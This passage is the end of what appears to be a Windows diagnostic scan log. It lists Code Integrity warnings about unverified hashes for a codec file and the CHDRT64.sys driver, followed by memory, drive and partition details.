hashes could not be found on the system. Date: 2014-10-23 18:17:00.796 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2012-12-23 06:56:33.246 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\CHDRT64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2012-12-23 06:56:33.231 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\CHDRT64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2012-12-23 06:49:47.902 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\CHDRT64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2012-12-23 06:49:47.870 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\CHDRT64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. ==================== Memory info =========================== Processor: Intel(R) Core(TM)2 Duo CPU T9400 @ 2.53GHz Percentage of memory in use: 28% Total physical RAM: 8088.01 MB Available physical RAM: 5803.22 MB Total Pagefile: 28706.54 MB Available Pagefile: 26291.57 MB Total Virtual: 8192 MB Available Virtual: 8191.84 MB ==================== Drives ================================ Drive c: () (Fixed) (Total:64 GB) (Free:0.65 GB) NTFS Drive d: () (Fixed) (Total:401.66 GB) (Free:354.01 GB) NTFS ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 3EF7C6F3) Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=64 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=401.7 GB) - (Type=07 NTFS) ==================== End Of Log ============================